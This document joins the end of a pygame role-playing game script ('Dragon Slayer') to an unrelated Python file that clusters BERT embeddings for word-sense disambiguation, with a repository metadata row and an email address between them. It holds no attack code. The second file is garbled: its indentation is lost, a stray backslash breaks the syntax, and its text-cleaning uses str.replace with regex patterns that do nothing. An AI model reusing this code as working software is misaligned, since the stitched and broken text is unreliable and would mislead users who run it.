        #Death
        if healthbar.rect.right <= 0:
            death()
        if dragonhealthbar.rect.left >= 1120:
            deathsound.play()
            victory()
        #Friendly Mob One
        if player.get_location() == 'town' and player.questlvl > 4:
            friendly_one.draw(GAMEDISPLAY)
            FriendlySpriteOne().handle_event(player.collisionrect, event, friendlymobtwo.direction, player.questlvl)
        #Friendly Mob Two
        if player.get_location() == 'town' and player.questlvl > 4:
            friendly_two.draw(GAMEDISPLAY)
            friendlymobtwo.handle_event(friendlymobtwo.direction, player.collisionrect, event, player.questlvl, player.firespeed)
            friendlymobtwo.update(friendlymobtwo.direction, player.collisionrect)
        #Friendly Mob Three
        if player.get_location() == 'town' and player.questlvl > 4:
            friendly_three.draw(GAMEDISPLAY)
            walker_two.handle_event(walker_two.direction, player.collisionrect, event, player.questlvl)
            walker_two.update(walker_two.direction, player.collisionrect)
        #Friendly Mob Four
        if player.get_location() == 'housetwo' and player.questlvl > 4:
            friendly_four.draw(GAMEDISPLAY)
            standing_sprite_two.handle_event(player.collisionrect, event, player.questlvl)
        #Shop keeper
        if player.get_location() == 'houseone' and player.questlvl > 4:
            shop_keeper.draw(GAMEDISPLAY)
            shop_owner.handle_event(player.collisionrect, event, player.questlvl)
        #Flower Operations
        if player.get_location() == 'westdesert':
            desert_flower.draw(GAMEDISPLAY)
        if pg.sprite.groupcollide(character, desert_flower, False, True) != {}:
            player.increase_flowers()
            if player.num_of_flowers == 1:
                standing_sprite_two.completed = True
        if standing_sprite_two.upgrade == True:
            player.movespeed = 8.4
            player.bootlvl = 1
        #Item Operations
        if player.get_location() == 'houseone':
            health_pots.draw(GAMEDISPLAY)
            shovels.draw(GAMEDISPLAY)
        # Each potion/shovel is bought at most once (runone..runfive flags).
        if player.num_of_coins >= 6:
            if runone == 0:
                if pg.sprite.collide_rect(player, potionone) == True:
                    potionone.kill()
                    player.num_of_potions += 1
                    player.num_of_coins -= 6
                    runone = 1
            if runtwo == 0:
                if pg.sprite.collide_rect(player, potiontwo) == True:
                    potiontwo.kill()
                    player.num_of_potions += 1
                    player.num_of_coins -= 6
                    runtwo = 1
            if runthree == 0:
                if pg.sprite.collide_rect(player, potionthree) == True:
                    potionthree.kill()
                    player.num_of_potions += 1
                    player.num_of_coins -= 6
                    runthree = 1
            if runfour == 0:
                if pg.sprite.collide_rect(player, potionfour) == True:
                    potionfour.kill()
                    player.num_of_potions += 1
                    player.num_of_coins -= 6
                    runfour = 1
        else:
            if pg.sprite.groupcollide(character, health_pots, False, False) != {}:
                message_display('You need {} more coins to pay for that!'.format(6 - player.num_of_coins), 20, 550, black)
        if player.num_of_coins >= 20:
            if runfive == 0:
                if pg.sprite.collide_rect(player, new_shovel) == True:
                    new_shovel.kill()
                    player.num_of_shovels += 1
                    player.num_of_coins -= 20
                    runfive = 1
        else:
            if pg.sprite.groupcollide(character, shovels, False, False) != {}:
                message_display('You need {} more coins to pay for that!'.format(20 - player.num_of_coins), 20, 550, black)
        #Bats in north river
        if player.get_location() == 'northriver':
            bats.draw(GAMEDISPLAY)
            batone.handle_event(event, batone.direction, player.collisionrect)
            batone.update(batone.direction)
            battwo.handle_event(event, battwo.direction, player.collisionrect)
            battwo.update(battwo.direction)
            batthree.handle_event(event, batthree.direction, player.collisionrect)
            batthree.update(batthree.direction)
            if bats.sprites() != [] and batplayed < 2:
                batone.sound.play()
                batplayed += 1
        #Slimes in far plains
        if player.get_location() == 'farplains':
            slimes.draw(GAMEDISPLAY)
            slimeone.handle_event(event, slimeone.direction, player.collisionrect)
            slimeone.update(slimeone.direction)
            slimetwo.handle_event(event, slimetwo.direction, player.collisionrect)
            slimetwo.update(slimetwo.direction)
            slimethree.handle_event(event, slimethree.direction, player.collisionrect)
            slimethree.update(slimethree.direction)
            slimefour.handle_event(event, slimefour.direction, player.collisionrect)
            slimefour.update(slimefour.direction)
            slimefive.handle_event(event, slimefive.direction, player.collisionrect)
            slimefive.update(slimefive.direction)
            if slimes.sprites() != [] and slimeplayed < 2:
                slimeone.sound.play()
                slimeplayed += 1
        #Deer in west one
        if player.get_location() == 'dragonone':
            deers.draw(GAMEDISPLAY)
            deerone.handle_event(event, deerone.direction, player.collisionrect)
            deerone.update(deerone.direction)
            deertwo.handle_event(event, deertwo.direction, player.collisionrect)
            deertwo.update(deertwo.direction)
            deerthree.handle_event(event, deerthree.direction, player.collisionrect)
            deerthree.update(deerthree.direction)
            if deers.sprites() != [] and deerplayed < 2:
                deerone.sound.play()
                deerplayed += 1
        #Wolves in west two
        if player.get_location() == 'dragonentrance':
            wolves.draw(GAMEDISPLAY)
            wolfone.handle_event(event, wolfone.direction, player.collisionrect)
            wolfone.update(wolfone.direction)
            wolftwo.handle_event(event, wolftwo.direction, player.collisionrect)
            wolftwo.update(wolftwo.direction)
            wolfthree.handle_event(event, wolfthree.direction, player.collisionrect)
            wolfthree.update(wolfthree.direction)
            wolffour.handle_event(event, wolffour.direction, player.collisionrect)
            wolffour.update(wolffour.direction)
            if wolves.sprites() != [] and wolfplayed < 2:
                wolfone.sound.play()
                wolfplayed += 1
        #Scorpions in desert
        if player.get_location() == 'desert':
            scorpions.draw(GAMEDISPLAY)
            scorpionone.handle_event(event, scorpionone.direction, player.collisionrect)
            scorpionone.update(scorpionone.direction)
            scorpiontwo.handle_event(event, scorpiontwo.direction, player.collisionrect)
            scorpiontwo.update(scorpiontwo.direction)
            scorpionthree.handle_event(event, scorpionthree.direction, player.collisionrect)
            scorpionthree.update(scorpionthree.direction)
            scorpionfour.handle_event(event, scorpionfour.direction, player.collisionrect)
            scorpionfour.update(scorpionfour.direction)
            if scorpions.sprites() != [] and scorpionplayed < 2:
                scorpionone.sound.play()
                scorpionplayed += 1
        #Boss
        if player.get_location() == 'dragoncave':
            dragons.draw(GAMEDISPLAY)
            dragonone.handle_event(event, dragonone.direction, player.collisionrect)
            dragonone.update(dragonone.direction)
            if dragonone.health > 0:
                dragonone.fire(player.collisionrect)
                dragonone.anger()
            else:
                fireballs.empty()
            if dragons.sprites() == []:
                victory()
            if dragons.sprites() != [] and dragonplayed < 4:
                dragonone.sound.play()
                dragonplayed += 1
        #Damage Dealer / Checker / Display
        health.draw(GAMEDISPLAY)
        if player.get_location() == 'dragoncave':
            dragonhealth.draw(GAMEDISPLAY)
            GAMEDISPLAY.blit(dragoncontainer, (812, 10))
        if pg.sprite.groupcollide(dragons, bullets, False, False, collided = None):
            dragonone.lower_health(7)
            dragonhealthbar.lower(0.9)
        if player.get_location() == 'heartcave':
            healthbox.draw(GAMEDISPLAY)
        if boxofhealth.rect.colliderect(player.collisionrect) == True and player.get_location() == 'heartcave':
            boxofhealth.healthupgrade()
            boxofhealth.mode = 1
            # One-time max-health upgrade, guarded by upgradepotential.
            if player.questlvl <= 11 and upgradepotential == True:
                boxofhealth.kill()
                healthbar.upgrade()
                upgradesound.play()
                player.healthlvl = 1
                player.questlvl = 12
                upgradepotential = False
        if boxofhealth.mode == 0:
            GAMEDISPLAY.blit(healthcontainer, (-28, 10))
        elif boxofhealth.mode == 1:
            GAMEDISPLAY.blit(healthcontainer, (0, 10))
            player.max_health = 296
        # Contact damage per map; the town is a safe zone.
        if player.get_location() == 'town':
            pass
        else:
            if pg.sprite.groupcollide(character, fireballs, False, True, collided = None) and player.get_location() == 'dragoncave':
                player.lower_health(0.8)
                healthbar.lower(0.8)
            elif pg.sprite.groupcollide(character, bats, False, False, collided = None) and player.get_location() == 'northriver':
                player.lower_health(0.4)
                healthbar.lower(0.4)
            elif pg.sprite.groupcollide(character, slimes, False, False, collided = None) and player.get_location() == 'farplains':
                player.lower_health(0.35)
                healthbar.lower(0.35)
            elif pg.sprite.groupcollide(character, deers, False, False, collided = None) and player.get_location() == 'dragonone':
                player.lower_health(0.5)
                healthbar.lower(0.5)
            elif pg.sprite.groupcollide(character, wolves, False, False, collided = None) and player.get_location() == 'dragonentrance':
                player.lower_health(0.75)
                healthbar.lower(0.75)
            elif pg.sprite.groupcollide(character, scorpions, False, False, collided = None) and player.get_location() == 'desert':
                player.lower_health(0.42)
                healthbar.lower(0.42)
            if pg.sprite.groupcollide(character, dragons, False, False, collided = None) and player.get_location() == 'dragoncave':
                player.lower_health(1)
                healthbar.lower(1)
        #Items Display
        GAMEDISPLAY.blit(coin_still, (335, 10))
        TextSurf, TextRect = text_objects(' x{}'.format(player.num_of_coins), mediumText, cream)
        TextRect.center = (410, 28)
        GAMEDISPLAY.blit(TextSurf, TextRect)
        GAMEDISPLAY.blit(potion_still, (500, 10))
        TextSurf, TextRect = text_objects(' x{}'.format(player.num_of_potions), mediumText, cream)
        TextRect.center = (575, 28)
        GAMEDISPLAY.blit(TextSurf, TextRect)
        GAMEDISPLAY.blit(shovelimg, (665, 10))
        TextSurf, TextRect = text_objects(' x{}'.format(player.num_of_shovels), mediumText, cream)
        TextRect.center = (740, 28)
        GAMEDISPLAY.blit(TextSurf, TextRect)
        #Player Display
        GAMEDISPLAY.blit(player.image, player.rect)
        clouds.draw(GAMEDISPLAY)
        # Respawn a weather-appropriate batch of clouds once they all scroll off.
        # NOTE(review): the new_cloud locals persist across frames; presumably a
        # cloud has been spawned before the first update() call below — confirm.
        if len(clouds.sprites()) < 1:
            if player.get_location() == 'town' or player.get_location() == 'northriver' or player.get_location() == 'eastplains' or player.get_location() == 'farplains':
                clouds.empty()
                new_cloud = Cloud((-500, random.randint(1,800)), random.choice(lclouds))
                newtwo_cloud = Cloud((-1000, random.randint(1,800)), random.choice(lclouds))
                newthree_cloud = Cloud((-800, random.randint(1,800)), random.choice(lclouds))
            elif player.get_location() == 'desert' or player.get_location() == 'eastdesert' or player.get_location() == 'westdesert' or player.get_location() == 'southdesert':
                clouds.empty()
                new_cloud = Cloud((-500, random.randint(1,800)), random.choice(dclouds))
            elif player.get_location() == 'dragonone' or player.get_location() == 'dragonentrance' or player.get_location() == 'dragoncave':
                clouds.empty()
                new_cloud = Cloud((-450, random.randint(1,800)), random.choice(sclouds))
                newtwo_cloud = Cloud((-700, random.randint(1,800)), random.choice(lclouds))
                newthree_cloud = Cloud((-500, random.randint(1,800)), random.choice(lclouds))
                newfour_cloud = Cloud((-900, random.randint(1,800)), random.choice(lclouds))
                newfive_cloud = Cloud((-550, random.randint(1,800)), random.choice(lclouds))
            new_cloud.update()
            newtwo_cloud.update()
            newthree_cloud.update()
            if player.get_location() == 'dragonone' or player.get_location() == 'dragonentrance' or player.get_location() == 'dragoncave':
                newfour_cloud.update()
                newfive_cloud.update()
        #Final operations in while loop
        pg.display.update()
        clock.tick(FPS)
#Get out of controls screen
def get_out():
    """Callback for the controls screen's Back button: return to the start menu.

    NOTE(review): this sets the *module-level* `controls` flag, but
    game_controls() loops on its own local `controls` variable, so this
    assignment never actually ends that loop -- the screen only "exits"
    because game_start() below never returns. Confirm this is intentional.
    """
    global controls
    controls = False
    game_start()
#Controls Screen
def game_controls():
    """Render the controls/help screen until the player clicks Back or quits.

    NOTE(review): the loop flag here is local; the Back button's get_out()
    callback re-enters game_start() rather than breaking this loop -- confirm
    the nested-loop design is intentional.
    """
    controls = True
    while controls:
        # The window close box must still work from this screen.
        for event in pg.event.get():
            if event.type == pg.QUIT:
                quitgame()
        GAMEDISPLAY.fill(black)
        title_surf, title_rect = text_objects('Game Controls', largeText, gray)
        title_rect.center = ((display_width / 2), (display_height / 5))
        GAMEDISPLAY.blit(title_surf, title_rect)
        # One help line per input device, spaced 75 px apart below the title.
        help_lines = (
            'Use arrow keys to move!',
            'Click mouse to engage with villagers!',
            'Hit escape to view progress, pause or for a tip!',
        )
        for row, message in enumerate(help_lines, start=1):
            line_surf, line_rect = text_objects(message, smallText, gray)
            line_rect.center = ((display_width / 2), ((display_height / 3.5) + 75 * row))
            GAMEDISPLAY.blit(line_surf, line_rect)
        button('Back', 500, 230, 100, 50, blue, hoverblue, get_out)
        pg.display.update()
#Start Screen
def game_start():
    """Main-menu loop: background, title, and Play / Quit / Controls buttons."""
    start = True
    while start:
        for event in pg.event.get():
            if event.type == pg.QUIT:
                quitgame()
        GAMEDISPLAY.blit(bgstart, (0, 0))
        title_surf, title_rect = text_objects('Dragon Slayer', largeText, black)
        title_rect.center = ((display_width / 2), (display_height / 5))
        GAMEDISPLAY.blit(title_surf, title_rect)
        # (label, x, width, callback); every menu button sits at y=230, h=50.
        for label, x_pos, width, action in (
            ('Play!', 180, 150, game_intro),
            (' Quit!', 840, 150, quitgame),
            ('Controls!', 500, 160, game_controls),
        ):
            button(label, x_pos, 230, width, 50, blue, hoverblue, action)
        pg.display.update()
#Victory Screen
def victory():
    """Endless victory screen: trophy image, banner text and a Quit button."""
    showing = True  # renamed from `victory`, which shadowed the function name
    while showing:
        for event in pg.event.get():
            if event.type == pg.QUIT:
                quitgame()
        GAMEDISPLAY.fill(black)
        GAMEDISPLAY.blit(trophy, ((display_width / 2) - 109.5, display_height / 2))
        banner_surf, banner_rect = text_objects('VICTORY', largeText, gray)
        banner_rect.center = ((display_width / 2), (display_height / 5))
        GAMEDISPLAY.blit(banner_surf, banner_rect)
        # Quit is the only way out of this screen (besides closing the window).
        button(' Quit!', (display_width / 2) - 50, (display_height / 2) - 60, 100, 50, blue, hoverblue, quitgame)
        pg.display.update()
#Unpause function
def unpause():
    """Callback for the pause screen's Resume button.

    Clears the module-level `pause` flag that game_pause()'s while-loop
    reads, letting that loop terminate on its next iteration.
    """
    pauseoutsound.play()  # audio cue for leaving the pause screen
    global pause
    pause = False
#Pause Screen
def game_pause(playerlvl, wandlvl, healthlvl, bootlvl):
    """Pause screen showing quest progress and a context-sensitive tip.

    Loops while the module-level `pause` flag is truthy; the Resume button's
    unpause() callback clears it.

    Args:
        playerlvl: quest progress (displayed out of 12).
        wandlvl, healthlvl, bootlvl: upgrade flags (each displayed out of 1).
    """
    pauseinsound.play()
    while pause:
        for event in pg.event.get():
            if event.type == pg.QUIT:
                quitgame()
        GAMEDISPLAY.fill(black)
        heading_surf, heading_rect = text_objects('Game Paused', largeText, gray)
        heading_rect.center = ((display_width / 2), (display_height / 5))
        GAMEDISPLAY.blit(heading_surf, heading_rect)
        # Progress read-out: one stat line every 75 px below the heading.
        stats = (
            'Player Quest Level: ' + str(playerlvl) + '/12',
            'Player Wand Level: ' + str(wandlvl) + '/1',
            'Player Health Level: ' + str(healthlvl) + '/1',
            'Player Boots Level: ' + str(bootlvl) + '/1',
        )
        for row, line in enumerate(stats, start=1):
            stat_surf, stat_rect = text_objects(line, smallText, gray)
            stat_rect.center = ((display_width / 2), ((display_height / 3.5) + 75 * row))
            GAMEDISPLAY.blit(stat_surf, stat_rect)
        # Tip selection mirrors the original if/elif ladder exactly.
        if playerlvl <= 7:
            tip = 'Tip: What is in that corner'
        elif wandlvl != 1 or healthlvl != 1:
            tip = 'Tip: Villagers may assist you in your quest'
        elif wandlvl == 1 and healthlvl == 1:
            tip = 'Tip: The dragon went west'
        else:
            tip = None  # unreachable given the branches above; kept for safety
        if tip is not None:
            tip_surf, tip_rect = text_objects(tip, smallText, gray)
            tip_rect.center = ((display_width / 2), ((display_height / 3.5) + 375))
            GAMEDISPLAY.blit(tip_surf, tip_rect)
        button('Resume', 180, 230, 100, 50, blue, hoverblue, unpause)
        button(' Quit', 840, 230, 100, 50, blue, hoverblue, quitgame)
        pg.display.update()
#Death Screen
def death():
    """Game-over screen shown when the player dies; only exit is Quit."""
    on_screen = True  # renamed from `death`, which shadowed the function name
    while on_screen:
        for event in pg.event.get():
            if event.type == pg.QUIT:
                quitgame()
        GAMEDISPLAY.fill(black)
        GAMEDISPLAY.blit(deathimg, ((display_width / 2) - 100, display_height / 2))
        caption_surf, caption_rect = text_objects('You Died', largeText, gray)
        caption_rect.center = ((display_width / 2), (display_height / 5))
        GAMEDISPLAY.blit(caption_surf, caption_rect)
        button(' Quit!', (display_width / 2) - 65, (display_height / 2) - 80, 100, 50, blue, hoverblue, quitgame)
        pg.display.update()
#Game introduction
def game_intro():
    """Opening cut-scene: dragon close-up, door creaking open, then the game.

    Stops the menu music, plays the animation once, and hands control to
    game_loop() for the first scene.
    """
    pg.mixer.music.stop()
    intro = True
    while intro:
        for event in pg.event.get():
            if event.type == pg.QUIT:
                quitgame()
        # Dragon mouth animation (image, x, y, hold seconds).
        display_image(dragonclosed, 0, 0, 1.5)
        display_image(dragonhalf, 0, 0, 0.05)
        display_image(dragonopen, 0, 0, 1.2)
        GAMEDISPLAY.fill(black)
        # Door opens over four frames; the creak gets louder with each frame.
        for door_img, hold, volume in (
            (doorone, 1.2, 0.04),
            (doortwo, 0.7, 0.08),
            (doorthree, 0.7, 0.12),
        ):
            display_image(door_img, 430, 546, hold)
            introdoor.set_volume(volume)
            introdoor.play()
        display_image(doorfour, 430, 546, 0.5)
        GAMEDISPLAY.fill(black)
        time.sleep(1.8)
        game_loop(650, 260, 900, 410, GameSceneOne())
        intro = False  # play the cut-scene exactly once
#Icon image
pg.display.set_icon(holdwand)  # window/taskbar icon for the game
#Initiation
pg.mixer.music.load(songs[5])  # background track for the start menu
pg.mixer.music.play(-1)  # -1 loops the music indefinitely
game_start()  # hand control to the start-menu loop (does not return)
| [
"lczernel@gmail.com"
] | lczernel@gmail.com |
15f341014c83987b874301eb336a62b9c02e9dad | 42afabf5de1a01a883824be45ddc456203b3241a | /intradomain_toolkit/intradomain_toolkit/disambiguation.py | 4f62d4a21fe28ce1b8ef51c5c5093903a672e3f2 | [
"MIT"
] | permissive | ambarish-moharil/intradomain | e4e33bf39778976f13a48fdc416ef18022219614 | bdfbe15552cd1a991a92f01752d3b9f6e409bd5b | refs/heads/main | 2023-06-26T13:47:10.178714 | 2021-07-24T11:21:55 | 2021-07-24T11:21:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87,894 | py | import pandas as pd
import re
import requests
import os
import nltk
import string
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk import word_tokenize, sent_tokenize
import torch
from transformers import BertTokenizer, BertModel
from transformers import BertTokenizer, BertModel
import logging
import matplotlib.pyplot as plt
import shutil
from sklearn.cluster import KMeans
import seaborn as sns
from scipy.spatial.distance import cosine
import pickle
from sklearn_extra.cluster import KMedoids
import os
def disambiguate():
model = BertModel.from_pretrained('bert-base-uncased',
output_hidden_states = True, # Whether the model returns all hidden-states.
)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
# Cleaning the text
def standardize_text(text_field):
text_field = text_field.replace(r"http\S+", " ")
text_field = text_field.replace(r"http", " ")
text_field = text_field.replace(r"(\d)", " ")
text_field = text_field.replace(r"@\S+", " ")
text_field = text_field.replace(r"[^A-Za-z0-9(),!?@\'\`\"\_\n,\\,/,.,:,;,'""']", " ")
text_field = text_field.replace(r"\\", " ")
text_field = text_field.replace(r".", " ")
text_field = text_field.replace(r";", " ")
text_field = text_field.replace(r",", " ")
text_field = text_field.replace(r":", " ")
text_field = text_field.replace(r"←", " ")
text_field = text_field.replace(r"≠", " ")
text_field = text_field.replace(r"'", " ")
text_field = text_field.replace(r"(", " ")
text_field = text_field.replace(r")", " ")
text_field = text_field.replace(r"[", " ")
text_field = text_field.replace(r"]", " ")
text_field = text_field.replace(r"[]", " ")
text_field = text_field.replace(r"?", " ")
text_field = text_field.replace(r"()", " ")
text_field = text_field.replace(r'"', " ")
text_field = text_field.replace(r"-", " ")
text_field = text_field.replace(r"{", " ")
text_field = text_field.replace(r"}", " ")
text_field = text_field.replace(r"*", " ")
text_field = text_field.replace(r"~,!", " ")
text_field = text_field.replace(r"@", " ")
text_field = re.sub("[?]", " ", text_field)
text_field = text_field.replace(r"#", " ")
text_field = text_field.replace(r"$", " ")
text_field = text_field.replace(r"%", " ")
text_field = text_field.replace(r"^", " ")
text_field = text_field.replace(r"&", " ")
text_field = text_field.replace(r"=", " ")
text_field = text_field.replace(r"+", " ")
text_field = text_field.replace(r"`", " ")
text_field = text_field.replace(r"<", " ")
text_field = text_field.replace(r">", " ")
text_field = text_field.replace(r"·", " ")
text_field = re.sub("[”“]", " ", text_field)
text_field = text_field.replace(r"//", " ")
text_field = text_field.replace(r"|", " ")
text_field = text_field.replace(r"|", " ")
text_field = text_field.replace(r"&[A-Z][a-z][0-9]", " ")
text_field = text_field.replace(r"[0-9]+", " ")
text_field = text_field.replace(r"[a-z]+", " ")
text_field = text_field.replace(r"[a-zA-z]", " ")
text_field = text_field.replace(r"\[0-9a-zA-Z]", " ")
text_field = re.sub("[–]", " ", text_field)
text_field = text_field.replace(r"λ", " ")
text_field = text_field.replace(r"@", "at")
text_field = text_field.lower()
text_field = re.sub("\s[0-9]+", " ", text_field)
text_field = re.sub("\b[a-z]\b", " ", text_field)
text_field = re.sub("—", " ", text_field)
text_field = re.sub("_", " ", text_field)
text_field = re.sub("™"," ", text_field)
text_field = re.sub("/", " ", text_field)
text_field = re.sub("[0-9]", " ", text_field)
text_field = text_field.replace("nin library and unix conventions the null character is used to terminate text strings such nullterminated strings can be known in abbreviation as asciz or asciiz where here stands for zero\\nbinary oct dec hex abbreviation name\\n\\n null nul ␀ null\\n som soh ␁ start of heading\\n eoa stx ␂ start of text\\n eom etx ␃ end of text\\n eot ␄ end of transmission\\n wru enq ␅ enquiry\\n ru ack ␆ acknowledgement\\n bell bel ␇ bell\\n fe bs ␈ backspaceef\\n ht sk ht ␉ horizontal tabg\\na lf ␊ line feed\\nb vtab vt ␋ vertical tab\\nc ff ␌ form feed\\nd cr ␍ carriage returnh\\ne so ␎ shift out\\nf si ␏ shift in\\n dc dle ␐ data link escape\\n dc ␑ device control often xon\\n dc ␒ device control\\n dc ␓ device control often xoff\\n dc ␔ device control\\n err nak ␕ negative acknowledgement\\n sync syn ␖ synchronous idle\\n lem etb ␗ end of transmission block\\n can ␘ cancel\\n em ␙ end of medium\\na ss sub ␚ substitute\\nb esc ␛ ei escapej\\nc fs ␜ file separator\\nd gs ␝ group separator\\ne rs ␞ record separator\\nf us ␟ unit separator\\nf del ␡", " ")
text_field = re.sub("[½¼¢~]", " ", text_field)
text_field = text_field.replace('\\n', " ")
text_field = text_field.replace("("," ")
text_field = text_field.replace(")"," ")
text_field = text_field.replace("#"," ")
text_field = text_field.replace("&"," ")
text_field = text_field.replace("\\"," ")
text_field = ' '.join(i for i in text_field.split() if not (i.isalpha() and len(i)==1))
return text_field
def get_sent(text, tarr):
with open(text, 'r') as f:
global inp_str
inp_str = target_list[tarr]
text = f.read()
text = text.replace('\\n', "")
text = text.replace("(","")
text = text.replace(")","")
sentences = sent_tokenize(text)
#for ref in range(len(top_102_words)):
#locals()["word_sentences" + str(ref)] = [" ".join([sentences[i-1], j, sentences[i+1]]) for i,j in enumerate(sentences) if str(top_102_words[ref]) in word_tokenize(j)]
global sent_word
sent_word = [" ".join([sentences[i-1], j, sentences[i+1]]) for i,j in enumerate(sentences) if inp_str in word_tokenize(j)]
#print(ref)
def filter_sent(list_input):
global filt_sent_
filt_sent_= []
for cln in list_input:
cleaned = standardize_text(cln)
filt_sent_.append(cleaned)
#return filt_sent_
target_list = []
## Listing all the inputs here
number_of_target_words = int(input("Enter the number of target terms that you wish to disambiguate\n"))\
for tar_index in range(number_of_target_words):
tar_name = input("Enter the target term\n")
target_list.append(tar_name)
len(target_list)
lower_label_int = int(input("Enter input for a starting label for which the threshold plot is to be obtained\n"))
upper_label_int = int(input("Enter input for a ending label for which the threshold plot is to be obtained\n"))
cluster_num_plot = int(input("Enter the cluster number for which the threshold plot is to be obtained\n"))
thresh = float(input("Enter the threshold for the context words to be obtained\n"))
directory_input = "elbow"
clustering_type = "kmeans"
text_corpus_path = str(input("Enter your path for the text corpus\n"))
dir_path = str(input("Enter the path where you wish to save all the plots\n"))
for tarr in range(len(target_list)):
try:
get_sent(text_corpus_path, tarr)
print(len(sent_word))
## Taking 852 sentences due to computational limitation
wrt = str(inp_str + 's')
if len(sent_word) < 3000:
print("Length Less than 3000")
vector_bucket = []
inter_sent = []
sent_word_ = []
word_bucket = []
#di = os.mkdir("/home/amboo/Desktop/BERT/context_results/" + clustering_type + "/" + directory_input)
#directory = os.mkdir("/home/amboo/Desktop/BERT/context_results/" + clustering_type + "/" + directory_input + "/"+ inp_str + "_" + str(1))
dir = dir_path + clustering_type + "/" + directory_input + "/"+ inp_str + "_" + str(1)
if os.path.exists(dir):
shutil.rmtree(dir)
os.makedirs(dir)
for gh in range(len(sent_word)):
sent_word_.append(sent_word[gh])
filter_sent(sent_word_)
print(len(filt_sent_))
print(len(sent_word_))
## Collecting the same word in different contexts
vector_mat_list = []
label_list = []
for sent_par in range(len(sent_word_)):
try:
marked_text_test = "[CLS]" + " " + filt_sent_[sent_par] + " " + "[SEP]"
tokenized_text_test = tokenizer.tokenize(marked_text_test)
indexed_tokens_test = tokenizer.convert_tokens_to_ids(tokenized_text_test)
segment_ids_test = [1]*len(tokenized_text_test)
tokens_tensors_test = torch.tensor([indexed_tokens_test])
segments_tensors_test = torch.tensor([segment_ids_test])
with torch.no_grad():
output_test = model(tokens_tensors_test, segments_tensors_test)
hidden_states_test = output_test[2]
token_embeddings_test = torch.stack(hidden_states_test, dim=0)
token_embeddings_test = torch.squeeze(token_embeddings_test, dim=1)
token_embeddings_test = token_embeddings_test.permute(1,0,2)
print(token_embeddings_test.size())
token_vecs_sum_test = []
for token_test in token_embeddings_test:
sum_vec_test = torch.sum(token_test[-4:], dim=0)
token_vecs_sum_test.append(sum_vec_test)
token_vecs_test = hidden_states_test[-2][0]
sentence_embedding_test = torch.mean(token_vecs_test, dim=0)
print ("Our final sentence embedding vector of shape:", sentence_embedding_test.size())
i_test_list = []
for i_test, token_str_test in enumerate(tokenized_text_test):
if token_str_test == inp_str:
print(i_test, token_str_test)
i_test_list.append(i_test)
vector_mat_list.append(token_vecs_sum_test[i_test_list[0]])
label_str = inp_str + " " + str(sent_par)
label_list.append(label_str)
print("vector values for each instance of" + " " + inp_str)
print('\n')
print(inp_str, str(token_vecs_sum_test[i_test_list[0]][:1]))
print("\n" + str(sent_par))
inter_sent.append(sent_word_[sent_par])
for tok in range(len(tokenized_text_test)):
if tokenized_text_test[tok] != inp_str and tokenized_text_test[tok] != wrt:
vector_bucket.append(token_vecs_sum_test[tok])
word_bucket.append(tokenized_text_test[tok])
except (IndexError, RuntimeError) as e:
# del locals()["sent_word_" + str(len(sent_word))][sent_par]
residual_list = []
final_sent_list = []
residual_list.append(sent_word_[sent_par])
# for sentr in locals()["sent_word_" + str(len(sent_word))]:
# if sentr not in residual_list:
# final_list.append(sentr)
#rint(len(final_list))
continue
elif len(sent_word) > 3000:
print("Length Greater than 3000")
vector_bucket = []
word_bucket = []
inter_sent = []
sent_word_ = []
#di = os.mkdir("/home/amboo/Desktop/BERT/context_results/" + clustering_type + "/" + directory_input)
#directory = os.mkdir("/home/amboo/Desktop/BERT/context_results/" + clustering_type + "/" + directory_input + "/"+ inp_str + "_" + str(1))
#directory = os.mkdir("/home/amboo/Desktop/BERT/context_results/" + inp_str + "_" + str(1))
dir = dir_path + clustering_type + "/" + directory_input + "/"+ inp_str + "_" + str(1)
if os.path.exists(dir):
shutil.rmtree(dir)
os.makedirs(dir)
for gj in range(3000):
sent_word_.append(sent_word[gj])
filter_sent(sent_word_)
print(len(filt_sent_))
print(len(sent_word_))
## Collecting the same word in different contexts
vector_mat_list = []
label_list = []
for sent_par in range(len(sent_word_)):
try:
marked_text_test = "[CLS]" + " " + filt_sent_[sent_par] + " " + "[SEP]"
tokenized_text_test = tokenizer.tokenize(marked_text_test)
indexed_tokens_test = tokenizer.convert_tokens_to_ids(tokenized_text_test)
segment_ids_test = [1]*len(tokenized_text_test)
tokens_tensors_test = torch.tensor([indexed_tokens_test])
segments_tensors_test = torch.tensor([segment_ids_test])
with torch.no_grad():
output_test = model(tokens_tensors_test, segments_tensors_test)
hidden_states_test = output_test[2]
token_embeddings_test = torch.stack(hidden_states_test, dim=0)
token_embeddings_test = torch.squeeze(token_embeddings_test, dim=1)
token_embeddings_test = token_embeddings_test.permute(1,0,2)
print(token_embeddings_test.size())
token_vecs_sum_test = []
for token_test in token_embeddings_test:
sum_vec_test = torch.sum(token_test[-4:], dim=0)
token_vecs_sum_test.append(sum_vec_test)
token_vecs_test = hidden_states_test[-2][0]
sentence_embedding_test = torch.mean(token_vecs_test, dim=0)
print ("Our final sentence embedding vector of shape:", sentence_embedding_test.size())
i_test_list = []
for i_test, token_str_test in enumerate(tokenized_text_test):
if token_str_test == inp_str:
print(i_test, token_str_test)
i_test_list.append(i_test)
vector_mat_list.append(token_vecs_sum_test[i_test_list[0]])
label_str = inp_str + " " + str(sent_par)
label_list.append(label_str)
print("vector values for each instance of" + " " + inp_str)
print('\n')
print(inp_str, str(token_vecs_sum_test[i_test_list[0]][:1]))
print("\n" + str(sent_par))
inter_sent.append(sent_word_[sent_par])
for tok in range(len(tokenized_text_test)):
if tokenized_text_test[tok] != inp_str and tokenized_text_test[tok] != wrt:
vector_bucket.append(token_vecs_sum_test[tok])
word_bucket.append(tokenized_text_test[tok])
except (IndexError, RuntimeError) as e:
residual_list = []
final_list = []
residual_list.append(sent_word_[sent_par])
continue
## Creating the nxn matrix
## 3 lists have been created for the input string
#sent_word ---- containing the sentence in which the word has been used
# vector_mat_list ---- containing the embedded vector wrt to the sentence
#label_list ----- labelled input string
## NxN Matrix Creation
print(len(vector_mat_list))
import numpy as np
input_shape = len(vector_mat_list)
target_matrix = np.zeros(shape=(input_shape,input_shape))
matrix_list = []
for i_ in range(input_shape):
for j_ in range(input_shape):
target_matrix[i_][j_] = 1 - cosine(vector_mat_list[i_], vector_mat_list[j_])
matrix_list.append([i_,target_matrix[i_][j_]])
print(str(i_), str(j_))
mat_dir = dir_path + "/matrices/"
if os.path.exists(mat_dir):
shutil.rmtree(mat_dir)
os.makedirs(mat_dir)
